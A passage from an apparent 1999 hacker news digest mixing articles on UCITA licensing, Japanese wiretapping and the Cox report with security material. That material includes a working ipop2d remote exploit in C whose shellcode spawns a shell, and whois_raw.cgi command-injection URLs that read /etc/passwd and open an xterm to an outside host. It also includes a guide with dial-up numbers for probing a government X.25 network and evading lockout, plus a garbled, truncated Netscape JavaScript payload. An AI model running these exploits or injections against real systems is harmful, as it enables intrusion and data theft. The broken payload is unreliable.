* give vendors the right to repossess software by disabling it remotely;
* make the terms of shrink-wrapped licenses more enforceable;
* prevent the transfer of licenses from one party to another without vendor permission;
* allow vendors to disclaim warranties; and
* outlaw reverse engineering.

Proponents of the law, primarily software vendors, say it is time for a uniform law that applies directly to software licenses. Critics, including technology consumer groups such as the Society of Information Managers (SIM), say UCITA is fatally flawed and should be killed. Other trade organizations representing the motion picture industry, newspapers, magazines, and the music recording industry, have joined SIM in opposing UCITA. In July, a state attorney organization known as the National Conference of Commissioners on Uniform State Laws (NCCUSL) will meet in Denver to approve UCITA. If the organization gives the proposal a green light, a few state legislatures are likely to rubber-stamp it by the end of the year and UCITA will become law, according to UCITA experts. This fast time table has opponents up in arms. Although SIM is in favor of a law to govern software licensing, it says it believes UCITA cannot be fixed. "This law would significantly increase the level of the burden on the IT procurement function and significantly increase the cost of procurement -- both in staff costs and out-of-pocket costs," says Susan Nycum, a SIM member and an attorney at law firm Baker & McKenzie, in Palo Alto, Calif.
Although many software vendor representatives attended development meetings to discuss the law and lobbied its creators, most attendees contacted by InfoWorld refused to discuss their views on the record. And although this law threatens to profoundly affect how IT departments in both large and small companies do business, most IT professionals remain unaware of the law and its ramifications.

"We were naive about how things were handled," says Randy Roth, a SIM member who also works at the Principal Financial Group, in Des Moines, Iowa. "We thought, gee, when people are writing these laws they are making sure they are balanced and somebody is watching out for our best interests."

Blackmail tool?

To the IT managers who have been following UCITA, perhaps the most threatening provision is vendor "self-help," or vendor repossession of software. According to the most recent draft of the law, a vendor can remotely disable a customer's software if the vendor decides that the customer has violated its license and the license includes language that says self-help is a possibility.

The proposed law would require the vendor to notify a company representative designated in the contract 15 days prior to taking such action, although it does not specify the means of notifying that representative. Such messages could spend weeks languishing in voice mail or e-mail if the wrong person happens to be on vacation.

"Self-help is a draconian remedy in which the licensor would act as judge, jury, and executioner to electronically disable or repossess software when in its self determination, the licensee has done something bad," says Barney Kantar, a member of SIM who also works at Dupont, in Wilmington, Del.

UCITA's champions counter that the software market would not tolerate vendors who shut off customers' software.

"So far the market has been a very good disciplinarian," says Micalyn Harris, vice president, secretary, and general counsel at Winpro, in Ridgewood, N.J. "Anyone who gets a reputation for shutting off software on customers is not very likely to stay in business."

But fear of getting a bad reputation has not stopped vendors from taking such draconian measures in the past. The most extreme case of a vendor repossessing software happened almost 10 years ago. Logisticon, a software vendor in Santa Clara, Calif., shut down Revlon Group's systems over the phone lines because it said Revlon had not paid the remaining $180,000 balance of a $1.2 million contract for warehouse management software. In a subsequent lawsuit, Revlon claimed its shipping operations were shut down for three days. The case was settled out of court in late 1990. As part of the settlement, the parties agreed not to divulge the terms.

Because UCITA specifically authorizes electronic self-help, critics say that software developers would have legal justification to build back doors and software time bombs in their programs. That itself would create a tremendous threat and reduce users' negotiating power, whether the license specified the self-help rights or not.

"The real danger of self-help is not so much that it will be invoked, but rather that it will be used as a threat hanging over licensees in order to extort compromises, concessions, and other payments that they would not otherwise agree to provide," Dupont's Kantar adds.

Adobe Systems corporate counsel Vincent Bryan, however, argues that according to current law, a vendor could shut down a customer without any notice. The self-help provisions of UCITA, he says, are designed to protect the software customer.

"What [the self-help provision] attempted to do was to reach a compromise between what SIM wanted -- which was that you had to go to court and trial before a small licensor could get paid," Bryan says.

John McCabe, NCCUSL legal counsel and legislative director, calls UCITA's provisions on vendor self-help a middle position.

"We are not banning this; we are not requiring judicial permission," McCabe says. "We are just putting parameters around it."

McCabe added that vendors are not permitted to exercise self-help if the vendors are aware of third parties that could suffer serious losses because of it.

Although Microsoft's UCITA representative, senior corporate attorney Robert W. Gomulkiewicz, requested that he not be quoted, a Microsoft public relations representative agreed that the law is designed to protect customers.

But the law's detractors dispute that vendor self-help provisions protect consumers, and they find this to be the most threatening aspect of the proposed law.

"Once we have licensed a product and put it into mission-critical use, self-help becomes a blackmail tool," Principal's Roth says. "Customers have no negotiating power at all."

Pass-alongs prohibited

Another UCITA provision could increase the costs of mergers and acquisitions by prohibiting the transfer of a software license from one company to another without permission from the vendor. Many shrink-wrapped licenses have blanket restrictions on transferability already, but vendors generally do not try to get a court to enforce them in a merger. UCITA would make those terms enforceable.

For example, if you have Microsoft Word on your computer, you will need to obtain permission from Microsoft to transfer that copy of Word from Company A to Company B, according to Cem Kaner, a career software developer in Santa Clara, Calif., an attorney, and the author of Bad Software: What to do when software fails.

"Imagine doing that for all the computer programs, utilities, drivers, printer drivers, clip art, fonts," Kaner says. "At some point the cost of having lawyers inspect every utility to figure out how to transfer it becomes too high. What will happen is people will simply erase the hard drives on the machines."

Software vendors argue that they are within their rights to limit the use of their products.

"Licenses tell users what it is that creators or providers of software regard as fair use," Winpro's Harris says.

Those definitions of fair use included in licenses have become more aggressive as the years have gone by, according to SIM, and often include transfer restrictions.

"If I buy a book, I can't make a copy and sell it. But I can sell my copy of the book or I can give away my copy," Dupont's Kantar says. "The same should be true for software."

However, UCITA transforms software from a product into a license to use this product, according to attorney Kaner.

"That flies in the face of how we have dealt with intellectual property in the past," Kaner says. "If you put something into the mass market, your rights as far as transferability end when the first buyer gives you the money."

But some vendors believe that because software is fundamentally different from other products, it deserves new rules.

"What UCITA is doing is validating the terms [of sale] after you pay," Adobe's Bryan says. "The academic community and consumer groups are saying that's not right -- the contract should be what the parties agree to at the time there is a transaction."

Bryan notes that airline tickets and rental-car reservations' licensing terms are not revealed until after sales are completed.

Not my fault

Another hotly contested provision of UCITA is one that allows vendors to disclaim warranties for defective, buggy, or virus-infested software.

Today, any features that a vendor demonstrates at a trade show or writes about in a product manual must be a working part of the product, according to Kaner, because under current law, any statement or affirmation of fact by seller to buyer is part of the basis of the bargain.

"UCITA takes the notion of a warranty by demonstration and guts it," Kaner says. "And in the mass market, UCITA makes it trivially easy to disclaim warranties."
Although proponents claim that the provisions in UCITA are not a change from the current law, other industry observers view UCITA as a license for commercial developers to turn out buggier software.

"It says manufacturers are not liable for the poor quality of their products," according to Watts Humphrey, a fellow of the Software Engineering Institute, a development institution with headquarters at Carnegie-Mellon University, in Pittsburgh. "I think that is bad for the nation."

The licensing loopholes that UCITA provides will cause lowered standards for software performance and will cost user companies more money because they will have to assure that the product works properly before they buy it, according to Baker & McKenzie's Nycum.

Software vendors counter that they need protection from customers in the fuzzy area of computer performance guarantees.

"If I have to guarantee that my software will perform the way you think it's going to perform, that's going to be costly for me," Winpro's Harris says. "Software isn't like a piece of furniture -- there are many other variables."

But critics do not believe software companies need more legal protection than they already have.

"I have yet to hear a good argument as to why the software industry needs more than it has today," Dupont's Kantar says. "They are enjoying double-digit growth and huge success in the marketplace. Why does the software industry need protection?"

Detractors also fear that UCITA will turn shrink-wrapped software licensing agreements -- which have become more and more restrictive over time -- into enforceable law. For example, many licensing agreements today state that customers who test the vendor's software are not allowed to publish the results of those tests, Kantar says.

"We frequently see license agreements that attempt to restrict free speech in prohibitions against publishing test results," Kantar explains. "UCITA would permit a licensor to restrict such fair use under a contract."
Many licensing agreements that come with shrink-wrapped software are "questionable at best," Principal's Roth says. "I would never put my name on a contract like that, so why should I be forced to accept it if I'm going to buy a lot of shrink-wrapped software?"

Read the fine print

SIM members also say they believe that the cost of procurement will rise if UCITA becomes law because companies will have to scrutinize shrink-wrapped software licenses as closely as those of mainframes and other large systems.

"Large companies spend about as much on shrink-wrapped software as they do on non-shrink-wrapped software," Kantar says. "Today most businesses don't devote significant resources to the negotiation of shrink-wrapped licenses. They will now have to start doing so because the default rules are shifting in favor of the licensor."

UCITA has other controversial provisions, leading the act's detractors to say it is too flawed to fix.

"If you are going to come up with a law that will last another 50 years, it needs to be written to be flexible and fair, and not [as] a wish list of what vendors want right now," Baker & McKenzie's Nycum says.

Michael Lattig, Bob Trott, and Jeff Walsh contributed to this article.

www.infoworld.com

For more on Uniform Computer Information Transactions Act (UCITA), go to www.infoworld.com/UCITA.

Information about UCITA's precursor, the Uniform Commercial Code 2B draft, and subsequent motions are available at www.2bguide.com.

A list of National Conference of Commissioners on Uniform State Laws (NCCUSL) representatives is at www.simnet.org/public/programs/issues/ucccode.html.

NCCUSL can be reached at www.nccusl.org.

The Society of Information Managers can be reached at www.simnet.org.

The origins of a law

The Uniform Computer Information Transactions Act (UCITA) began as a proposed change to the Uniform Commercial Code's Article 2, which dealt with the sale of goods.
The Uniform Commercial Code (UCC) are laws designed to make commerce uniform from state to state. These laws are written by the National Conference of Commissioners on Uniform State Laws (NCCUSL), a group founded in the late 19th century during the states' rights movement and approved by the American Law Institute (ALI). The commissioners are attorneys, usually from small law firms, appointed and paid for by the states to represent them to the Conference. Once NCCUSL approves a bill, it is very likely to be passed by state governments.

The ALI advises NCCUSL on creating amendments to the UCC. ALI is largely an honorary, academic organization of tenured law professors.

ALI officials called NCCUSL's 2B draft "unbalanced" and declined to put it to a membership vote at their annual meeting earlier this month. NCCUSL decided then to make 2B a stand-alone bill, not part of the UCC. The proposed law then became known as UCITA. A current draft of UCITA was not available at press time.

@HWA

12.0 Japan Follows Australia in Limiting Privacy
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by erewhon

In an effort to help law enforcement stop murders, drug trafficking, gun running, and illegal immigration, Japan is proposing new draconian legislation that will give sweeping power to eavesdrop on all communications. This includes telephone and email.

Wired

Japan: More Crime, Less Privacy
by David Lazarus
3:00 a.m. 2.Jun.99.PDT

TOKYO -- Privacy issues have taken center stage as Japan prepares to enact legislation allowing the police to eavesdrop on phone calls, intercept fax and computer transmissions, and read email.

The draconian measures are ostensibly intended to help law enforcement halt premeditated murders, trafficking in drugs and guns, and smuggling of illegal aliens into Japan. At least that's what a bill cobbled together by the country's coalition government says.
The reality could be far more intrusive, especially after investigators receive an official green light to comb through private correspondence and communications.

Japanese citizens' groups -- a hodgepodge of activists with little actual influence over policy decisions -- have decried the wiretapping legislation as a gross invasion of privacy, and opposition politicians boycotted a vote on the legislation last Friday.

But the government insists that what Japan needs to restore public order is less civil liberty and more Big Brother.

People here are scared. Crime -- once unthinkable in Japan -- is on the rise. The country's yakuza racketeers are growing increasingly bolder in their schemes as nearly a full decade of recession eats away at traditional revenue sources, such as payoffs from companies and corrupt politicians.

For law-enforcement authorities, the trouble began back in 1995 when Aum Shinrikyo cultists released sarin gas in the Tokyo subway, killing a dozen people. The cops simply never saw the attack coming, and have been agitating for greater surveillance powers as a means of preventing such nastiness from happening again.

Wiretapping is a convenient shortcut for investigators. And, as the pervasive eavesdropping of former East Bloc countries made undeniably clear, once authorities start listening it's a hard habit to break.

Yozo Marutake, a former senior executive with a manufacturer of hearing aids called Rion, said last week that the Japanese police have been bugging phones for decades. How does he know this? Because his company sold the cops all their surveillance gear, and had done so since first being approached by authorities in 1957, he said.

So why would the Japanese police now be seeking legal backing for their electronic skulking? One reason might have to do with charges from an opposition politician last year that his phone had been bugged.
The courts upheld the politician's claims, although the cops never actually admitted being behind the incident.

The Internet undoubtedly will be a low priority at first for Japan's snoops, but this will change as more people, criminals included, go online.

For now, it looks like the cops are still unsure how to proceed where matters of cyberspace are concerned. Police last week raided the Sapporo home of an 18-year-old who had posted a bunch of hit tunes on his home page using the MP3 compression format. The teen, needless to say, hadn't worked out copyright issues in advance with related Japanese recording companies.

Police didn't reveal how they learned about the song-laden site. But they said they moved quickly to shut things down after concluding that illegal actions were being perpetrated. This only took them three months of monitoring downloads to figure out.

David Lazarus is on special assignment. He is filing occasional dispatches on the current state of business and technology in Japan.

@HWA

13.0 AGNPAC Revealed
     ~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Hack.Canada

A document describing the Alberta Government Packet Switched Network (AGNPAC) has been released by Hack Canada. This document goes into great detail about the X.25 WAN that spans Alberta.

Hack Canada
http://www.hackcanada.com/homegrown/agnpac_guide.txt

Complete Guide to AGNPAC v1.0
CYB0RG/ASM
www.hackcanada.com
05.30.99

----------------
What is AGNPAC?
----------------

AGNPAC is the Alberta Government Packet Switched Network based on the X.25 protocol. It is a Wide Area Network which spans across Alberta. It is used to connect systems and networks used by the Alberta Government, Alberta Registries, hospitals, schools, libraries, and other such entities.

The backbone for this network is made up of full T1 fibre optic lines. Other WAN's and nodes are connected to the AGNPAC backbone via T1, 128K Frame Relay circuits (full CIR), and multiple 128K Frame Relay circuits.
The network can also be connected to through local dialups in most cities and large towns in Alberta.

AGNPAC is built, managed, and maintained by Alberta Public Works Supply and Service (PWSS) and funded by the Alberta provincial government. Recently publicly funded school board use has also come into play with beta trials becoming more widespread through the late nineties.

The AGNPAC network has been in existence since at least 1995, however, no information regarding it has been publicly available... until now. There is still much to learn about this network, and this file, the most complete publicly available document on AGNPAC, is still somewhat lacking. However, this file will be updated as new discoveries are made.

---------------------
Connecting to AGNPAC
---------------------

Dial ports exist in most major towns and cities across Alberta. The standard communication parameter 8/N/1 is used although some systems on AGNPAC may use 7/E/1. When you connect you will see a message similar to this:

  AGNPAC: 4007 030

-----------
Dial Ports
-----------

Athabasca             675-9424
Barrhead              674-2045
Blairmore             562-7426
Bonnyville            826-1753
Brooks                793-2254
Calgary               234-8066
Calgary               269-7425  v.34 only
Camrose               672-3689
Canmore               678-6966
Cardston              653-1006
Claresholm            625-2241
Drayton Valley        542-6038
Drumheller            823-4224
Edmonton              420-6198  v.34 only
Edmonton              425-5674
Edmonton              425-5691
Edmonton              429-1522
Edson                 723-5352
Evansburg             727-3572
Fairview              835-5688
Fort McMurray         743-6302
Grande Cache          827-2044
Grande Prairie        539-0195
Hanna                 854-2615
High Level            926-2142
High Prairie          523-2673
Hinton                865-1393
Jasper                852-4846
Lac La Biche          623-3832
Lethbridge            380-2067
Lloydminster          875-1237
Manning               836-2683
Medicine Hat          528-2135
Olds                  556-2930
Oyen                  664-2505
Peace River           624-1055
Pincher Creek         627-2444
Red Deer              341-4097
Rocky Mountain House  845-5552
Slave Lake            849-2826
Smoky Lake            656-2291
St. Paul              645-1847
Stettler              742-5581
Valleyview            524-2454
Vegreville            632-2213
Vermillion            853-6941
Wainwright            842-5103
Wetaskiwin            352-2384
Whitecourt            778-4677

------------------
System Addressing
------------------

Systems attached to AGNPAC are addressed most commonly by 9 digit Network User Addresses (NUA's). That's 1 billion possible NUA's. These NUA's follow a simple format of 9 consecutive digits (#########).

Other NUA formats may exist but the only exception to the 9 digit NUA that I know of is something I call an "alias". Aliases are acronyms preceded by a dot. These aliases resolve to a regular NUA which is revealed when you connect to the host. Here are some examples of known aliases and their corresponding NUA's:

  .govtcpdial = 4004 11188
  .cgsbbs     = 4004 059010 (oddly enough this resolves to a 10 digit NUA)

Anyway, back to the NUA's. As far as I can tell the 9 digit NUA's have a 4 digit prefix and a 5 digit suffix. Or possibly they break down like this:

                    (####)(###)(##)
                      :     :   :
City Code? ...........:     :   :
                            :   :
Address Prefix? ............:   :
                                :
System Address? ................:

But that's just a hunch I've got based on the NUA's that I know of.

I also have reason to believe there may be system subaddressing, or Logical Channels (LCN), in which case the address may be suffixed with 1 or 2 digits to connect to a subaddress of the system. And there may also be mnemonics, data characters which follow the address preceded by a comma. Mnemonics are used to connect to sub-systems of the host system. But again, this is all just speculation for now.

----------------------------
Connecting to a Host System
----------------------------

To connect to a system you enter its NUA and if it is valid you will get a message like this:

  AGNPAC: call connected to #### #####

Now you may receive an identifying message and the system's prompt depending on the system, or you may get a connect message and no prompt at all. Sometimes if you press it will forward you to the host's prompt.
To disconnect from a host that you have connected to and get back to the main prompt use the command "p clr".

For a list of known NUA's refer to the "AGNPAC NUA Directory" (agnpacnua.txt) on www.hackcanada.com in the Canadian H/P-Hacking section.

---------------------
Command Line Options
---------------------

Some of these are used from the main prompt and some are used in conjunction with an NUA. Further experimentation is still forthcoming.

Command  Use                           Description
-------  ----------------------------  -------------------------------
c                                      Closed User Group
clr      Preceded by p                 Used to clear a circuit locally
f                                      [Restricted] Fast Select
int      Preceded by p                 ???
l                                      Packet Size
n        n ######### (where # is NUA)  Normal call (default)
p        p ######### (where # is NUA)  Priority call
par?                                   Displays parameters
reset    Preceded by p                 Resets locally
set      : [,:]                        Sets parameters
stat                                   Displays statistics

-------------------
Scanning for NUA's
-------------------

The most important thing to know when scanning NUA's on AGNPAC is how to disconnect from an NUA that you have connected to and get back to the main prompt. This is done with the command "p clr".

The second most important thing to know is that you will be disconnected from AGNPAC after ten failed attempts in a row. You will want to connect then disconnect from a known good NUA after every 8 or 9 failed attempts.

---------------
Error Messages
---------------

More often than not when scanning for NUA's you will get an error message rather than a call connected message. There are simply FAR more unassigned NUA's than there are NUA's in use. Here is a guide to error messages and their meanings.

  AGNPAC: call cleared - address not in service

The most common message. It means the address is currently not assigned to a host system.

  AGNPAC: call cleared - access barred

The calling terminal is not permitted to establish a connection to the host system. AGNPAC emits this error message on direction from the host.
It is a system that only accepts calls from specified originating NUA's.

  AGNPAC: comma required before data characters

This message is common when you mistype an NUA. This message may refer to the use of mnemonics to connect to sub-systems of the host as mentioned in the "System Addressing" section of this file.

  AGNPAC: call cleared - destination busy

The host system may just be temporarily busy, permanently busy, or down.

  AGNPAC: call cleared - destination not responding

The host is ignoring your connect request or it is down.

  AGNPAC: call cleared - remote directive

This is likely a clearing of the virtual circuit in response to a clear request packet sent from the host system. The right subaddressing and/or mnemonics can probably get by this.

  AGNPAC: call cleared - local directive

This message indicates that the user has used the command "p clr" to clear the virtual circuit in order to disconnect from an NUA.

  AGNPAC: call cleared - temporary network problem

The host system is either temporarily or permanently down.

  AGNPAC: invalid command

Invalid command line option.

  AGNPAC: command not allowed

Command line option used improperly.

  AGNPAC: invalid packet size

Command line option "l" was used in conjunction with an invalid packet size.

  AGNPAC: service option not subscribed

Some NUA's result in this message. I don't know why.

--------
Credits
--------

Shouts to The Clone and Wizbone for helping pioneer research on this network. And to Deicide for the file "Introduction to Datapac" which gave me insight into command line options.

Copyright (c) 1999 Hack Canada

@HWA

14.0 Bomb Making Info Available, For Nukes!
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by akeldama

The Chinese are claiming that the recently released Cox report that lambasted computer security at the Department of Energy and pointed the finger at China for stealing US Nuclear secrets was a total farce.
China is claiming that the nuclear 'secrets' it supposedly stole are in fact freely available on the web, so just how secret can they be. Better Grab your nuclear info before it too disappears.

Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_129241,00.htm

Federation Of American Scientists
http://www.fas.org/

China Says Nuke Data Is On Web
June 1, 1999
By Hans Lombardo
Managing Editor, asia.internet.com
International News Archives

[Hong Kong, CHINA] In a seething attack on the Cox Report, the Chinese government yesterday declared that performance data on US nuclear warheads was available on the Web and in printed publications.

Zhao Qizheng, the information minister for China's State Council, told reporters in a press conference that "performance data on the seven types of nuclear warheads--W56, W62, W70, W76, W78, W87 and W88--have long been openly published in the United States."

"In recent years, performance data about various types of nuclear warheads, ranging from the early MK-1 to the latest W88, can easily be found on the Internet," stated Zhao.

The minister demonstrated how this nuclear warhead information was easily available on the website of the Federation of American Scientists (FAS). The FAS website provides users with a "Complete List of All U.S. Nuclear Weapons".

The Cox Report is the published findings of a US congressional probe led by Republican Christopher Cox which alleges that China plundered nuclear weapons secrets from the United States over the last two decades.

The Beijing regime has condemned the report as a politically motivated attempt by forces in the United States to damage US-China relations and prevent China from developing into an economic power.

"The Chinese Government and people are strongly indignant over this groundless attack that fabricates facts and confuses black and white," Zhao also said about the report.

"This is a great slander against the Chinese nation and is typical racial prejudice," Zhao added.
The Chinese government has also criticized the Cox Report's suggestion that the United States intensify control over the export of dual-purpose commodities and technology to China.

"It even unreasonably demands China should establish a so-called open and transparent system which enables American nationals designated by the United States to examine on the spot the end-users without advance notice," said Zhao. "This is a hegemonic act that disregards China's sovereignty and violates the basic norms governing international relations."

Some local infopreneurs are concerned that a possible US backlash against the export of technologies to China will have an impact on China and Hong Kong's IT infrastructure development.

15.0 Exploit code for remote ipop2d security vulnerability that gives attacker a shell as user 'nobody'.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

By c0nd0r, Sekure SDI.

/*
 * Sekure SDI (Brazilian Information Security Team)
 * ipop2d remote exploit for linux (Jun, 02 1999)
 *
 * by c0nd0r
 *
 * (read the instructions below)
 *
 * Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
 * falcon, vader, c_orb, marty(nordo!) and minha malinha!
 * also to #uground (irc.brasnet.org) and #SDI (efnet),
 * guys at el8.org, toxyn.org, pulhas.org
 *
 * Sincere Apologizes: duke (for the mistake we made with the wu-expl),
 * your code rocks.
 *
 * Usage:
 *
 * SDI-pop2 [offset]
 *
 * where imap_server = IMAP server at your box (or other place as well)
 * user = any account at your box
 * pass = the account's password
 * offset = 0 is default -- increase if it's necessary.
 *
 * Example: (netcat rocks)
 *
 * (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
 *
 * ----------------------------------------------------------------
 * HOWTO-exploit:
 *
 * In order to gain remote access as user nobody, you should set
 * an IMAP server at your box (just edit the inetd.conf) or at
 * any other machine which you have an account.
 *
 * During the anonymous_login() function, the ipop2d will set the
 * uid to user nobody, so you are not going to get a rootshell.
 * ----------------------------------------------------------------
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * (shellcode)
 *
 * jmp 0x1f
 * popl %esi
 * movl %esi,0x8(%esi)
 * xorl %eax,%eax
 * movb %eax,0x7(%esi)
 * movl %eax,0xc(%esi)
 * movb $0xb,%al
 * movl %esi,%ebx
 * leal 0x8(%esi),%ecx
 * leal 0xc(%esi),%edx
 * int $0x80
 * xorl %ebx,%ebx
 * movl %ebx,%eax
 * inc %eax
 * int $0x80
 * call -0x24
 * .string \"/bin/sh\"
 * grab your shellcode generator at www.sekure.org
 */

char c0d3[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
              "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
              "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
              "\xff\xff/bin/sh";

main (int argc, char *argv[] ) {
  char buf[2500];
  int x,y=1000, offset=0;
  long addr;
  char host[255], user[255], pass[255];
  int bsize=986;

  if ( argc < 4) {
    printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
    printf ( "usage: (SDI-pop2 [offset];cat) | nc lame.org 109\n");
    exit (0);
  }

  snprintf ( host, sizeof(host), "%s", argv[1]);
  snprintf ( user, sizeof(user), "%s", argv[2]);
  snprintf ( pass, sizeof(pass), "%s", argv[3]);

  if ( argc > 4) offset = atoi ( argv[4]);

  /* gimme the ret + offset */
  addr = 0xbffff3c0 + offset;
  fprintf ( stderr, "0wning data since 0x%x\n\n", addr);

  /* calculation of the return address position */
  bsize -= strlen ( host);

  for ( x = 0; x < bsize-strlen(c0d3); x++)
    buf[x] = 0x90;

  for ( y = 0; y < strlen(c0d3); x++, y++)
    buf[x] = c0d3[y];

  for ( ; x < 1012; x+=4) {
    buf[x ] = addr & 0x000000ff;
    buf[x+1] = (addr & 0x0000ff00) >> 8;
    buf[x+2] = (addr & 0x00ff0000) >> 16;
    buf[x+3] = (addr & 0xff000000) >> 24;
  }

  sleep (1);
  printf ( "HELO %s:%s %s\r\n", host, user, pass);
  sleep (1);
  printf ( "FOLD %s\r\n", buf);
}

@HWA

16.0 Netscape Communicator 4.x "view-source:" JavaScript based security vulnerability
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

Date: Tue, 1 Jun 1999 19:08:49 +0300
From: Georgi Guninski
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator "view-source:" security vulnerabilities

There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.

Vulnerabilities:

Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
Probably others

This vulnerability may be exploited by using HTML email message.

Workaround: Disable JavaScript

Netscape is notified about the problem.

Demonstration is available at: http://www.nat.bg/~joro/viewsource.html

Regards,
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski

[ Part 2: "Attached Text" ]
[ The following text is in the "koi8-r" character set. ]
[ Your display is set for the "US-ASCII" character set. ]
[ Some characters may be displayed incorrectly. ]

There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
The problem is that it allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.

Vulnerabilities:

Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
Probably others

This vulnerability may be exploited by using HTML email message.

Workaround: Disable JavaScript

This demonstration tries to find your email address, it may take some time.

Written by Georgi Guninski

s="view-source:wysiwyg://1/javascript:s='vvvv>&>"" +"" +" blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\" " +"for(i=0;i'"; //a=window.open(s); location=s;

@HWA

17.0 Vulnerability in Broker FTP Server v. 3.0 Build 1
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

Date: Tue, 1 Jun 1999 07:24:24 +0200
From: Arne Vidstrom
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Vulnerability in Broker FTP Server v. 3.0 Build 1

Hi,

I've found a vulnerability in Broker FTP Server v. 3.0 Build 1. Here's an example:

You have it installed with FTP root in c:\FTProot and you have a user "test" with home directory in c:\FTProot\test. You also have checked the "Display as ROOT directory" checkbox for test, so he/she can't get below the home directory. CWD won't take him/her below it, but LIST will:

LIST ..\..\winnt\

will list the contents of c:\winnt and

NLST ..\..\winnt\

will also list the contents of c:\winnt. Of course this isn't as bad as if CWD or RETR had worked, but you probably don't want anybody to be able to look around in your private directories...

I've contacted Transsoft about this, and they should have released a new version that fixed this more than a week ago. I've contacted them again but they haven't given me a reply this time.

/Arne Vidstrom

@HWA

18.0 whois_raw.cgi problem
     ~~~~~~~~~~~~~~~~~~~~~

From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml

Date: Tue, 1 Jun 1999 00:34:51 +0200
From: Salvatore Sanfilippo -antirez-
To: BUGTRAQ@netspace.org
Subject: whois_raw.cgi problem

Hi,

sorry if this has already been known.

There is a problem in whois_raw.cgi, called from whois.cgi. whois_raw.cgi is part of cdomain v1.0. I don't know if new versions are vulnerable.

#!/usr/bin/perl
#
# whois_raw.cgi Written by J. Allen Hatch (zone@berkshire.net)
# 04/17/97
#
# This script is part of the cdomain v1.0 package which is available at:
# http://www.your-site.com/~zone/whois.html
...
require ("/usr/lib/perl5/cgi-lib.pl");
...
$fqdn = $in{'fqdn'};
# Fetch the root name and concatenate
# Fire off whois
if ($in{'root'} eq "it") {
    @result=`$whois_cmd_it $fqdn`;
} elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
    @result="Dettagli non disponibili per il dominio richiesto.";
} else {
    @result=`$whois_cmd $fqdn`;
}
...

The exploit is a banal and well known problem:

http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

bye,
antirez

--
Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com
try hping: http://www.kyuzz.org/antirez antirez@seclab.com
'se la barca non ce l'hai dove uzba te ne vai? se la barca te la ruba, preo.' (M. Abruscato & O. Carmeci)

---------------------------------------------------------------------------------

Date: Wed, 2 Jun 1999 00:16:42 +0200
From: Peter van Dijk
To: BUGTRAQ@netspace.org
Subject: Re: whois_raw.cgi problem

On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> Hi,
>
> sorry if this has already been known.
>
> There is a problem in whois_raw.cgi, called from
> whois.cgi. whois_raw.cgi is part of cdomain v1.0.
> I don't know if new versions are vulnerable.

Version 2.0 is just as vulnerable.

The commercial version (the one that runs on NT too :) is _not_ vulnerable since it does its own socket thing instead of starting 'whois'.

I've known of this bug in cdomain for about 6 months but never got around to writing up an advisory...

Greetz, Peter
--
| 'He broke my heart,  | Peter van Dijk
| I broke his neck'    | peter@attic.vuurwerk.nl
| nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl
|                      | Hardbeat@undernet - #groningen/#kinkfm/#vdh |

---------------------------------------------------------------------------------

Date: Wed, 2 Jun 1999 01:06:22 +0200
From: Peter van Dijk
To: BUGTRAQ@netspace.org
Subject: Re: whois_raw.cgi problem

On Wed, Jun 02, 1999 at 12:16:42AM +0200, Peter van Dijk wrote:
> On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
> > Hi,
> >
> > sorry if this has already been known.
> >
> > There is a problem in whois_raw.cgi, called from
> > whois.cgi. whois_raw.cgi is part of cdomain v1.0.
> > I don't know if new versions are vulnerable.
>
